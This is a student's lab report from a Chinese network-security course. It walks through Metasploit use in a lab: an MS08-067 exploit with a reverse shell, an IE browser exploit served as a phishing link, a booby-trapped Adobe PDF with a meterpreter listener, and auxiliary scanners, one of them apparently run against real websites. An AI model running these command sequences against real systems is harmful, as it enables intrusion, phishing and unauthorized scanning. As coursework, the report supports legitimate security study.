2017-2018-2 20155228 《网络对抗技术》 实验四:MSF基础应用

2017-2018-2 20155228 《网络对抗技术》 实验四:MSF基础应用

1. 实践内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.1 一个主动攻击实践,如ms08_067; (1分)

1.2 一个针对浏览器的攻击,如ms11_050;(1分)

1.3 一个针对客户端的攻击,如Adobe;(1分)

1.4 成功应用任何一个辅助模块。(0.5分)

以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。


2. 基础问题回答

用自己的话解释什么是exploit,payload,encode.

  • exploit是渗透攻击,负责通过某种渗透方式将载荷运输到目标主机中
  • payload是载荷,是在渗透成功过后要执行的文件或者指令
  • encode是编码,负责对攻击所需的代码进行编码处理,防止出现坏字符或者被杀毒软件发现

3. 实践总结与体会

做完实验是体会到老师说的"不成功是正常的,成功是很少的"这句话的意思

渗透攻击对平台环境的要求是很高的,一点不对都会导致失败

漏洞能不能用还只能试试才知道,怎么用也得花些功夫才能研究清楚

不过能找到别人没用过的漏洞还是很有成就感的

另外现在扫描搜集信息也是越来越难了,很多网站都有防范处理,增加了攻击的难度


4. 离实战还缺些什么技术或步骤

  • 实验中是知道远程主机的操作系统,软件版本等等一系列信息的,但是实战中这些信息都要自己去搜集
  • 实验中社会工程学的工作都不用做了,直接把后门软件或者网站让远程主机打开就行了,实战中需要精心的伪装才能骗到人
  • 实验中的远程主机基本没有防护措施比如杀毒软件防火墙等等,才会那么容易攻击成功

5. 实践过程记录

5.0 关于msfconsole的介绍

官方文档

实验指导

5.1 主动攻击实践

5.1.1 关于MS08-067

MS08-067:Vulnerability in Server service could allow remote code execution

INTRODUCTION

This is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system remotely. On Microsoft Windows 2000-based, Windows XP-based, and Windows Server 2003-based systems, an attacker could exploit this vulnerability over RPC without authentication and could run arbitrary code. If an exploit attempt fails, this could also lead to a crash in Svchost.exe. If the crash in Svchost.exe occurs, the Server service will be affected. The Server service provides file, print, and named pipe sharing over the network.

介绍

这是一个远程代码执行漏洞。成功利用此漏洞的攻击者可以远程完全控制受影响的系统。在基于Microsoft Windows 2000,Windows XP和Windows Server 2003的系统上,攻击者可能通过RPC利用此漏洞而无需身份验证,并且可能会运行任意代码。如果攻击尝试失败,这也可能导致Svchost.exe崩溃。如果发生Svchost.exe中的崩溃,则服务器服务将受到影响。 服务器服务通过网络提供文件,打印和命名管道共享。

适用操作系统

  • Windows Server 2008 Datacenter without Hyper-V
  • Windows Server 2008 Enterprise without Hyper-V
  • Windows Server 2008 for Itanium-Based Systems
  • Windows Server 2008 Standard without Hyper-V
  • Windows Server 2008 Datacenter
  • Windows Server 2008 Enterprise
  • Windows Server 2008 StandardHyper-V Server 2008
  • Windows Web Server 2008
  • Windows Vista Business
  • Windows Vista Enterprise
  • Windows Vista Home Basic
  • Windows Vista Home Premium
  • Windows Vista Starter
  • Windows Vista Ultimate
  • Windows Vista Enterprise 64-bit edition
  • Windows Vista Home Basic 64-bit edition
  • Windows Vista Home Premium 64-bit edition
  • Windows Vista Ultimate 64-bit edition
  • Windows Vista Business 64-bit edition
  • Windows Vista Business
  • Windows Vista Enterprise
  • Windows Vista Home Basic
  • Windows Vista Home Premium
  • Windows Vista Starter
  • Windows Vista Ultimate
  • Windows Vista Enterprise 64-bit edition
  • Windows Vista Home Basic 64-bit edition
  • Windows Vista Home Premium 64-bit edition
  • Windows Vista Ultimate 64-bit edition
  • Windows Vista Business 64-bit edition
  • Microsoft Windows Server 2003 Service Pack 1
  • Microsoft Windows Server 2003 Standard Edition (32-bit x86)
  • Microsoft Windows Server 2003 Enterprise Edition (32-bit x86)
  • Microsoft Windows Server 2003 Datacenter Edition (32-bit x86)
  • Microsoft Windows Server 2003 Web Edition
  • Microsoft Windows Server 2003 Datacenter Edition for Itanium-Based Systems
  • Microsoft Windows Server 2003 Enterprise Edition for Itanium-based Systems
  • Microsoft Windows Server 2003 Datacenter x64 Edition
  • Microsoft Windows Server 2003 Enterprise x64 Edition
  • Microsoft Windows Server 2003 Standard x64 Edition
  • Microsoft Windows XP Professional x64 Edition
  • Microsoft Windows Server 2003 Service Pack 2
  • Microsoft Windows Server 2003 Standard Edition (32-bit x86)
  • Microsoft Windows Server 2003 Enterprise Edition (32-bit x86)
  • Microsoft Windows Server 2003 Datacenter Edition (32-bit x86)
  • Microsoft Windows Server 2003 Web Edition
  • Microsoft Windows Server 2003 Datacenter x64 Edition
  • Microsoft Windows Server 2003 Enterprise x64 Edition
  • Microsoft Windows Server 2003 Standard x64 Edition
  • Microsoft Windows XP Professional x64 Edition
  • Microsoft Windows Server 2003 Datacenter Edition for Itanium-Based Systems
  • Microsoft Windows Server 2003 Enterprise Edition for Itanium-based Systems
  • Microsoft Windows XP Service Pack 2
  • Microsoft Windows XP Home Edition
  • Microsoft Windows XP Professional Edition
  • Microsoft Windows XP Service Pack 3
  • Microsoft Windows XP Home Edition
  • Microsoft Windows XP Professional Edition

5.1.2 操作步骤

msfconsole//启动msfconsole
use exploit/windows/smb/ms08_067_netapi//使用针对ms08_067的渗透攻击模块
set payload generic/shell_reverse_tcp//设置载荷为TCP反向回连
set LHOST 192.168.232.131//设置本地地址
set LPORT 5228//设置本地主机端口
set RHOST 192.168.232.135//设置远程主机地址
set target 0//设置自动识别远程主机操作系统类型
exploit

注意:如果提示ConnectionTimeOut导致攻击结束但会话创建失败,尝试重新输入exploit命令或者重启远程主机。

注意:为了保证攻击能够成功,需要将防火墙关闭

5.2 针对浏览器的攻击

5.2.1 关于MS11-003

根据实验要求,要有一个实践内容不重复,已经试过百度没有发现其他人使用MS11-003漏洞的情况。

这个漏洞是在/usr/share/metasploit-framework/modules/exploits/windows/browser目录下找到的,就紧挨着MS11-050

介绍

...漏洞可在用户使用 Internet Explorer 查看特制 Web 页面或者用户打开一个加载特制库文件的合法 HTML 文件时允许远程执行代码。成功利用这些漏洞的攻击者可以获得与本地用户相同的用户权限。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。对于 Windows 客户端上的 Internet Explorer 6、Internet Explorer 7 和 Internet Explorer 8,安全更新的等级为“严重”;对于 Windows 服务器上的 Internet Explorer 6、Internet Explorer 7 和 Internet Explorer 8,安全更新的等级为“中等”...

从官方文档上来看这个漏洞还是很厉害的,对Internet Explorer 6、Internet Explorer 7 和 Internet Explorer 8都有用

5.2.2 操作步骤

msfconsole
use exploit/windows/browser/ms11_003_ie_css_import//使用针对ms11_003的渗透攻击模块
set PAYLOAD windows/meterpreter/reverse_tcp//设置载荷为TCP反向回连
set URIPATH 20155228//设置URLPATH,就是跟在ip地址后面的页面的名称,内容可以随便写,比如说写成baidu.com将更具有迷惑性
set LHOST 192.168.232.131//设置本地主机地址
set LPORT 1030//设置本地主机端口,只要是大于1024的都可以
set SRVPORT 1031//设置钓鱼网站链接的假端口号,写成80也可以,写成443也行
set SRVHOST 192.168.232.131//钓鱼网站的地址要和本地主机地址保持一致
exploit

之后会生成一个钓鱼网站的链接,把这个链接复制了拿到远程主机上用浏览器打开即可

对WinXP平台上的IE8进行攻击

本地主机显示连接没有问题,但是一直卡在传输css上面,而远程主机是显示完毕没有任何提示消息

所以说是凉了

对Win7平台上的IE8进行攻击

换一个平台再试一下

看到successfully migrated to expolore.exe就说明成功建立会话了

而远程主机可以看到网页并不能正常打开

sessions//显示当前建立起的会话
sessions -i n//进入某一个会话,建议n值取会话id最大的那一个的值

现在就可以为所欲为了

5.3 针对客户端的攻击

生成后门pdf文件

msfconsole
use windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.232.131
set LPORT 5228
set FILENAME 20155228.pdf
exploit

把生成的pdf文件放到远程主机中

打开监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.130.130
set LPORT 5303
exploit

本地主机打开监听以后,远程主机再打开pdf文件即可

5.4 应用一个辅助模块

5.4.1 ipidseq辅助模块

应用于ip名为ipidseq的scanner可以用来寻找能够满足TCP空闲扫描要求的空闲主机

TCP空闲扫描是一种高级Nmap扫描技巧

一种更加高级的nmap扫描方式是TCP空闲扫描,这种扫描能让我们冒充网络上另一台主机的IP地址,对目标进行更为隐秘的扫描

进行这种扫描之前,我们需要在网络上定位一台使用递增IP帧标识(IPID:用于跟踪IP包的次序的一种技术)机制的空闲主机(空闲是指该主机在一段特定的时间内不向网络发送数据包)。

首先进入辅助模块目录下的嗅探器目录

cd /usr/share/metasploit-framework/modules/auxiliary
ls
cd scanner
ls
cd ip
ls

其次启动msfconsole查看ipidseq用来干什么

msfconsole
info auxiliary/scanner/ip/ipidseq

description写得比较费解

然后是使用ipidseq

use auxiliary/scanner/ip/ipidseq
set RHOSTS 192.168.232.132-135
exploit

ipidseq模块中的options设置:必设置的项为:RHOSTS。这个可是单个IP,也可以是一个IP段(如192.168.1.1-192.168.1.254)、CIDR地址(192.168.1.0/24),另外THREAD参数是设定扫描线程数的,默认为1单线程。增加参数值可提高扫描速度,降低参数值可减少网络上的数据流量。一般来说,在windows平台上运行metasploit这个参数值最好不要超过16,在类unix平台上运行不要超过128。

最后是根据结果使用nmap

nmap -sI 192.168.232.134 -O 192.168.232.135
//192.168.232.134的结果为IPID sequence class: Incremental说明192.168.232.134是空闲的
//可以伪装成192.168.232.134对192.168.232.135进行扫描

5.4.2 title辅助模块

首先定位这个模块在哪个目录里面

/usr/share/metasploit-framework/modules/auxiliary/scanner/http

其次在msfconsole中使用info了解title

msfconsole
info auxiliary/scanner/http/title

这个模块很简单就是查看网站的title

最后使用title对网站进行扫描

可以看出来很多网站都是对扫描做了防范的,但是电科院的网站没有



2017-2018-2 20155228 《网络对抗技术》 实验四:MSF基础应用

原文地址:https://www.cnblogs.com/besti20155228/p/8965023.html

时间: 2024-08-27 15:05:41

2017-2018-2 20155228 《网络对抗技术》 实验四:MSF基础应用的相关文章

2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用

2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 payload:generic/shell_bind_tcp(成功且唯一) ms17_010_eternalblue:"永恒之蓝"自动化攻击 payload:windows/x64/shell/reverse_tcp_uuid(成功且唯一) 攻击浏览器的实践 ms10_046

2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms08-067; (1分) 一个针对浏览器的攻击,如ms11-050:(1分) 一个针对客户端的攻击,如Adobe:(1分) 成功应用任何一个辅助模块.(0.5分) 2.基础问题回答 exploit是利用漏洞,将攻击代码传送到靶机上,并对靶机进行一系列控制操作的整

2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用

2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 1. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何一个辅助模块.(0.5分) 任务一 主动攻击实践,ms08_067 靶机:Windows XP SP3

网络对抗技术实验四

Chinese people' public security university 网络对抗技术 实验报告   实验四 恶意代码技术     学生姓名 李御瑾 年级 2015 区队 三区队 指导教师 高见     信息技术与网络安全学院 2018年10月17日   实验任务总纲 2018-2019 学年 第 一 学期 一.实验目的 1.通过对木马的练习,使读者理解和掌握木马传播和运行的机制:通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识. 2.

2018~2019-10 20165107 网络对抗技术 Exp9 Web安全基础

20165107 网络对抗技术 Exp9 Web安全基础 实验要求 本实践的目标理解常用网络攻击技术的基本原理,做不少于7个题目,包括(SQL,XSS,CSRF) Webgoat实践下相关实验. 基础问题问答 1.SQL注入攻击原理,如何防御 SQL注入攻击原理:是指通过构建特殊的输入作为参数传入Web应用程序,输入执行SQL语句进而执行攻击者所要的操作.如在用户名.密码登输入框中输入一些',--,#等特殊字符,实现引号闭合.注释部分SQL语句,利用永真式实现登录.显示信息等目的. 如何防御:

2018-2019-2 20165307《网络对抗技术》Exp5 MSF基础应用

<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,各式各样的漏洞在exploit上进行配置 payload也就相当于载荷,相当于在exploit上创建好了之后在靶机上运行,回连 encode是编码,是为了避免payload中出现坏字符,影响payload的功能,其次是为了实现免杀 post我感觉是最后的修饰吧,在完成之后用post最后进行修饰 离实战还缺些什么技术或步骤? 实验中我们用的靶机大都

2018-2019-2 20165234 《网络对抗技术》Exp5 MSF基础应用

实验四 恶意代码分析 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.一个主动攻击实践,ms08_067(成功) 2. 一个针对浏览器的攻击,ms11_050(成功) 3. 一个针对客户端的攻击,Adobe(成功) 4. 成功应用任何一个辅助模块,scanner/ssh/ssh_version,(成功,唯一) 基础问题 用自己的话解释什么是exploit,payload,encode: Exploit:exploit 的英文意思为利

网络对抗技术 实验一

实验报告一 学   号201421440025   中国人民公安大学  People Public Security University Of China 网络对抗技术 实验报告   实验一 网络侦查与网络扫描     学生姓名 赵新桐 年级 2014 区队 网络安全与执法四区队 指导教师 高见     信息技术与网络安全学院 2017年7月7日 实验任务总纲 2017-2018 学年 第 一 学期 一.实验目的 1.加深并消化本课程授课内容,复习所学过的互联网搜索技巧.方法和技术: 2.了解

网络对抗技术—实验一实验报告

学   号:201421450005   中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告   实验一 网络侦查与网络扫描     学生姓名 王潜翔 年级 2014级 区队 网安五区 指导教师 高见     信息技术与网络安全学院 2017年7月7日   实验任务总纲 2017-2018 学年 第 一 学期 一.实验目的 1.加深并消化本课程授课内容,复习所学过的互联网搜索技巧.方法和技术: 2.了解并熟悉常用搜索引擎

网络对抗技术——实验一

中国人民公安大学 Chinese people' public security university 网络对抗技术 实验报告   实验一 网络侦查与网络扫描     学生姓名 雷浩 年级 2014级 区队 五区 指导教师 高见     信息技术与网络安全学院 2017年7月7日   实验任务总纲 2017-2018 学年 第 一 学期 一.实验目的 1.加深并消化本课程授课内容,复习所学过的互联网搜索技巧.方法和技术: 2.了解并熟悉常用搜索引擎.扫描工具.社交网站等互联网资源,对给定的任务进